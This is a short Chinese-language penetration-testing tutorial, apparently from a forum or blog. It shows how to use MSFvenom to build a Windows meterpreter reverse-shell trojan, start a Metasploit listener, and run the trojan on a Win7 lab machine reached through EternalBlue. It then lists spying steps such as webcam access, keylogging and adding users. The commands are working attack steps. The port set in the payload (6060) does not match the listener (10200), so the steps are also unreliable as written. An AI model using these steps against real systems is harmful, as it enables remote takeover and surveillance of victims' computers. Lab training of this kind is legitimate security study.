MSFvenom恶意程序生成与利用

MSFvenom

1.1 MSFvenom介绍

MSFvenom是Msfpayload和Msfencode的组合，可以生成各种攻击载荷，并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上，而msfvenom可以快速创建符合靶机的载荷，Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载，如Android，Windows，Unix，Nodejs，Cisco等等。

英文介绍来源：https://www.offsec.com（网站有风险打开需谨慎）
1.2 MSFvenom 简单使用

示例说明：今天利用MSFvenom 制作一个 .exe 的木马文件，然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行（这里为了加深了解永恒之蓝操作，也可以手动发送至win7）。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。
1.2.1 MSFvenom手册

1. #> man msfvenom

复制代码

1.2.2 环境介绍

攻击机：
项目参数备注机器类型攻击机操作系统kaliIP地址192.168.2.214靶机：
项目参数备注机器类型靶机操作系统win7关闭防火墙卸载相关杀毒软件IP地址192.168.2.233
1.2.3 木马文件生成

1. #>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe

复制代码

命令解说：
命令说明备注windows/meterpreter/reverse_tcp有效载荷类型，可以根据实际情况进行选择LHOST攻击机的IP，即靶机点击程序后回链的ipLPORT攻击机的端口，即靶机点击程序后回链的端口-f输出的格式
1.2.4 设置侦听

启动msfconsole

1. #> msfconsole

复制代码

设置监听

1. msf6>use exploit/multi/handler
3. msf6>set payload windows/meterpreter/reverse_tcp
5. msf6>set lhost 192.168.2.214 #攻击机ip
7. msf6>set lport 10200 #链接端口
9. msf6>exploit/run #运行

复制代码

1.2.5 在靶机中运行程序

将文件拷贝到靶机并运行（直接拷贝或通过永恒之蓝漏洞上传，参考《渗透基础+永恒之蓝演练》）。

1.2.6 程序生效，执行相关SHELL

运行1.exe文件

在运行的瞬间，kali就已经监听并链接成功！下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。

普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法



免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！